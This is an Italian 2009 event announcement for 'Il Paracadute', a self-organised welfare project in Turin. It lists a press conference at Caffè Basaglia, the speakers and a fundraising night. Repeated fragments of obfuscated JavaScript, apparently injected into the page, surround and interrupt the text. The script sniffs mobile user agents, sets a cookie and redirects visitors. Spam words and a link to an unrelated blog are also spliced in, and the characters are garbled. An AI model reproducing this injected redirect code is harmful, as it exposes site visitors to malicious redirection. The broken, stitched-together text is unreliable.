)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}

Arriva il PARACADUTE

In una societA? liquido-moderna gli individui non possono concretizzare i propri risultati in beni duraturi: in un attimo, infatti, le attivitA? si traducono in passivitA? e le capacitA? in incapacitA?. […]Provare a capire come andrA? in futuro sulla base di esperienze pregresse diventa sempre piA? azzardato e sin troppo fuorviante. […] La vita liquida A?, insomma, una vita precaria, vissuta in condizioni di continua incertezza.
(Zygmunt Bauman, La vita liquida)

Terra del Fuoco, insieme a Studenti Indipendenti, Associazione La Goccia, ed un gruppo di studenti medi, lavoratori e precari della scuola ha deciso di promuovere un’iniziativa rivolta a quelle fasce piA? gravemente colpite dalla crisi finanziaria: giovani, precari, operai.

Il progetto, significativamente chiamato a??il paracadutea??, prevede la costruzione di una rete di welfare auto-organizzata e autofinanziata, attraverso la promozione di incontri periodici che forniscano occasioni di scambio culturale e sociale. Cineforum, cene, dibattiti ed in generale spazi di confronto sono alla base di quest’iniziativa, che mira ad organizzare una struttura simile a quella del tradizionale a??dopolavoroa??, a cui perA? prendano parte non solo diverse generazioni di lavoratori, ma anche gli studenti. Inoltre l’iniziativa si propone anche di fornire alcuni piccoli strumenti di sostegno al reddito.

Il calendario degli incontri in programma fino a Natale, verrA? presentato al pubblico e ai media nel corso di una conferenza stampa indetta per VenerdA? 30 ottobre 2009 ore 11 presso il CaffA? BasagliaA? (Via Mantova, 34, Torino).

Prenderanno parte alla conferenza stampa:

Ugo Zamburru, Associazione CaffA? Basaglia
Michele Curto, Presidente di Terra del Fuoco
Giorgio Airaudo, Segretario regionale FIOM
vytorin Cosimo Scarinzi, in rappresentanza dei sindacati di base
Luca Spadon, portavoce di Studenti Indipendenti
Un rappresentante dei Precari Autoconvocati della Scuola

Sempre al Basaglia, sabato 31 ottobre 2009 gli organizzatori promuoveranno una serata di autofinanziamento con dj set, il cui costo d’ingresso sarA? di 10 euro compresa consumazione, finanziamento e tessera Arci 2009 (8 euro per chi ha giA? la tessera Arci).

IL PARACADUTE w|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{}))(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}}85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])} )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])} kegunaan elocon http://yajuge.com/blog/?p=8956 )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}